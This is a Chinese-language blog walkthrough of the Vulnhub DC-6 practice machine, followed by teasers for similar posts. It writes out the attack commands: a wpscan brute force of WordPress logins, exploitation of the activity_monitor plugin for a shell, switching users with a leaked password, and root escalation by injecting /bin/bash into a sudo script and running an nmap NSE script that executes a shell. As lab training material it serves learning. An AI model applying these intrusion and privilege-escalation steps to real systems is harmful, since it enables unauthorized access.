Vulnhub靶机渗透测试——DC-6

最新推荐文章于 2022-08-02 20:00:04 发布
最新推荐文章于 2022-08-02 20:00:04 发布
阅读量378 收藏
点赞数
文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chiza2596/article/details/124842533
版权

一、实验环境

攻击机(kali):192.168.189.148

靶机(ubuntu):192.168.189.186

二、信息收集

1、使用nmap探测存活主机

nmap -sP 192.168.189.0/24

2、IP192.168.189.186为我们的靶机,再次使用nmap对其进行深度扫描

nmap -sV -A -T4 -p- 192.168.189.186

3、访问IP后发现不能正常访问,我们可以像dc2一样修改hosts文件

4、修改完成后即可正常访问

5、通过页面我们可以发现该站点使用了wordpress,并且通过首页的提示可能与wordpress插件有关

6、扫描目录发现后台地址

dirb http://wordy

 7、通过wpscan对网站进行扫描

wpscan --url http://wordy/ -e u

除了发现了几个用户名之外并没有任何有价值的东西

 8、通过靶场的提示我们可以得到一个密码字典

官网提示使用rockyou.txt:cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt。

gzip -d /usr/share/wordlists/rockyou.txt.gz
cat /usr/share/wordlists/rockyou.txt | grep k01 > dc6passwd.txt

三、漏洞利用

1、解压完成之后再次使用wpscan扫描网站,这次带上我们的密码字典

wpscan --url http://wordy/ -e u -P dc6passwd.txt

 通过wpscan爆破得到了密码helpdesk01

2、登录网站后我们发现了activity_monitor插件

 3、搜索activity_monitor插件的相关漏洞

searchsploit activity monitor

4、直接利用py脚本拿shell

利用py脚本拿到shell之后发现执行其他命令时很容易断开连接,我们直接反弹一个shell到kali

5、利用python起一个会话窗口

python -c "import pty;pty.spawn('/bin/bash')"

6、我们在/home/mark/stuff目录下发现thing-to-do.txt文件

 7、我们从上面的文件得到graham用户的密码,切换到该用户,并查看其sudo权限

www-data@dc-6:/home/mark/stuff$ su graham
su graham
Password: GSo7isUM1D4

graham@dc-6:/home/mark/stuff$ sudo -l

 8、发现一个backups.sh文件,其内容为压缩备份web文件。

cat backups.sh

9、我们写入:echo "/bin/bash" >> backups.sh,运行后它会打开一个shell(此处会打开jens用户的shell)。

使用jens的身份执行该脚本:

sudo -u jens /home/jens/backups.sh

四、权限提升

1、查看jens的sudo权限,发现有nmap

sudo -l

 2、使用nmap进行提权

echo 'os.execute("/bin/sh")' >getshell.nse
sudo nmap --script=getshell.nse

3、成功拿到root权限

 4、成功获取到flag

 

小陈是个憨憨
关注
vulnhub】---DC-6靶机
qq_43168364的博客
08-21 713
目录 一、实验环境 二、信息收集 三、渗透测试   1、漏洞发现和利用   2、提权 四、总结 一、实验环境 靶机靶机(192.168.15.154) 攻击机:kali Linux(192.168.15.129) 二、信息收集 主机发现 命令:nmap -sn 192.168.15.0/24 命令:netdiscover -i eth0 -r 192.168.15.0/24 端口扫描 版本探测和操作系统识别 web指纹识别 网站目录扫描 三、渗透测试 1、漏洞发现和利用 2、提权 四、总结 渗
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9134
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
vulnhub渗透测试靶机DC-7
weixin_46128614的博客
01-19 500
下载地址:https://www.vulnhub.com/entry/dc-7,356/ nmap -sT -sV -p- -T5 192.168.49.21 我们进到80端口,作者提示我们不是爆破和字典攻击,让我们跳出box 在左下角留了一个用户,应该是Twitter的,老外都爱用Twitter 果然 我们把github上的内容下载下来,查看到了一个配置文件给到了一个账号和密码 dc7u...
vulnhubDC6靶机
LainWith的博客
02-14 564
目录介绍信息收集主机发现主机信息探测访问网站wpscan测试站点登录站点反弹shell信息收集提权 介绍 系列: DC(此系列共10台) 发布日期:2019 年 4 月 26 日 难度:初级-中级 Flag:获取root权限,并拿到唯一的flag 学习: ● wordpress 安全测试 ● 本地代码执行 ● nmap 提权 靶机地址:https://www.vulnhub.com/entry/dc-6,315/ 提示信息: 靶机支持Virtualbox和Vmware 需要修改hosts文件,如:192.
Vulnhub DC-6
柠檬木有枝
07-14 501
nmap 扫描服务 修改 hosts 文件 发现是 wordpress wpscan --url http://wordy/ --enumerate u 查看wordpress用户 爆破得密码 mark:helpdesk01 发现 active monitor 插件 搜索 exp ,反弹 shell 发现用户名密码 python -c 'import pty;pty.spawn("/b...
VulnHubDC-6
weixin_39219503的博客
02-01 335
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-6,315/ 题目信息如下 Description DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. T...
Vulnhub靶机实战——DC-2
冠霖L的博客
09-27 4830
靶机DC-2下载地址:https://download.vulnhub.com/dc/DC-2.zip 描述:靶机DC-2与DC-1一样,共有5个flag,但最终需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.132 Kali的IP地址:192.168.22...
Vulnhub靶机实战——DC-6
冠霖L的博客
10-28 3930
靶机DC-6下载地址:https://download.vulnhub.com/dc/DC-6.zip 环境:VMware 15虚拟机软件 DC-6靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.142 DC-6靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.142...
Vulnhub靶机实战——DC-1
冠霖L的博客
09-27 1997
靶机DC-1下载地址:https://download.vulnhub.com/dc/DC-1.zip 描述:靶机DC-1共有5个flag,并且需要root权限才可以找到并查看flag 环境:Vmware 15 Pro虚拟机软件 DC-1靶机IP地址:192.168.220.130 Kali的IP地址:192.168.220.131 本...
Vulnhub靶机实战——DC-5
冠霖L的博客
10-27 4960
靶机DC-5下载地址:https://download.vulnhub.com/dc/DC-5.zip 环境:VMware 15虚拟机软件 DC-5靶机IP地址:192.168.220.139 Kali的IP地址:192.168.220.145 DC-5靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.145 ...
vulnhubdc6
qq_54030686的博客
06-14 891
DC系列第六篇,整体而言难度较低,此篇之后,不再进行较为细致的篇幅 总体逻辑:话不多说,开始干 主机发现,端口扫描 目标IP为192.168.43.140 开放两个端口22 和80 端口,其中80端口对应的服务为wordy,修改hosts文件,路径为/etc/hosts,添加值 22端口尝试进行爆破,采用用户名top50,字典使用弱口令top100进行尝试 未发现相应结果 进行指纹识别 发现为wordpress框架,使用wordpress专用扫描器进行检测,使用-e参数爆破用户 存在5个用户复制变异成字典
Vulnhub:fourandsix2渗透测试
mandarava的博客
03-11 435
。。。
Vulnhub靶机DC系列-DC-6
m0_54525483的博客
01-07 1686
Vulnhub靶机DC系列-DC-6 靶场名称:DC-6 靶场地址:https://www.vulnhub.com/entry/dc-6,315/ 下载地址: DC-6.zip (Size: 619 MB) Download: http://www.five86.com/downloads/DC-6.zip Download (Mirror): https://download.vulnhub.com/dc/DC-6.zip Download (Torrent): https://download.vuln
VulnHub靶机系列】DC6
Ms08067安全实验室
08-02 210
文章来源|MS08067 安全实验室本文作者:大方子(Ms08067实验室核心成员)主机信息Kali:192.168.0.128 DC-6:192.168.0.130实验过程先找到DC-6的IP地址sudoarp-scan--interfaceeth0192.168.0.1/24然后用Nmap对DC-6进行扫描sudonmap-sS-sC-sV-p-192.168.0.130可...
Vulnhub靶机渗透测试实战(一):入门DC-1靶机完全渗透
weixin_48991458的博客
11-16 5684
菜鸡的第一篇学习分享 ——Vulnhub靶机渗透测试实战(一):入门DC-1靶机完全渗透 关于Vulnhub:Vulnhub是一个特别好的渗透测试实战网站,提供了许多带有漏洞的渗透测试靶机下载。https://www.vulnhub.com/ 根据Vulnhub的要求是要拿到root权限和5个flag,有了大体思路。(Vulnhub每个靶机上都有相应的提示,这一点很良心!) 靶机下载地址:https://www.vulnhub.com/entry/dc-1-1,292/ 靶机难度:入门 靶机描述:DC-1
vulnhub靶机CLAMP渗透测试
Long_gone的博客
12-07 478
一、扫描 打开靶机后先扫描靶机IP: arp-scan 192.168.34.0/24 经检验,确定靶机IP为:192.168.34.154,然后扫描靶机端口开放情况: nmap -sV -A -p 0-65535 192.168.34.154 发现靶机只开放了22和80端口,先访问80端口看一下: 进来发现是个这个界面,然后扫描一下它的目录,主要这里要加大字段进行目录爆破,否则得话是爆...
渗透测试靶机渗透Vulnhub-bulldog
SunnyCat
06-01 2998
目录前言一、bulldog靶机安装二、bulldog靶机渗透1、信息搜集2、Web渗透--后台登录3、Web渗透--命令注入&nc反弹shell4、权限提升渗透步骤回顾感悟 前言 bulldog靶机的渗透有很多的前辈都做了教程,我这篇也是参考了许多前辈的博客,但是中间还是有很多不懂得地方,官方说有两条路可以拿到root,我只找到了一条。以下内容均是我作为一个菜鸡实操之后的所得,为了留个印子记下来。 参考博客: https://blog.csdn.net/Eastmount/article/detai
Vulnhub-DC-6
T1me
10-30 253
入门系列第三弹DC-6 基本信息 下载地址:DC-6 靶机:vmware,192.168.172.138 攻击机:kali2 Flag:1个 渗透过程 0x01 nmap扫描 扫描一下,只有22和80开放,然后注意一下作者告诉我们配置一下host了,记得改成wordy。 0x02 漏洞发现 访问wordy后,发现还是和之前的dc-2一个界面啊,估计又是wp吧。 访问一下/wp-admin成功之后,确认就是wp了,wpscan一样先扫一手用户名。然后保存一下,准备爆破。 wpscan --url http
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
Vulnhub靶机环境可以帮助我们学习和实践渗透测试技术。 二、JIS-CTF题目描述 JIS-CTF是日本信息安全竞赛,旨在提高日本信息安全技术的水平。JIS-CTF题目涵盖了网络安全、系统安全、加密安全等多个领域。 三、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值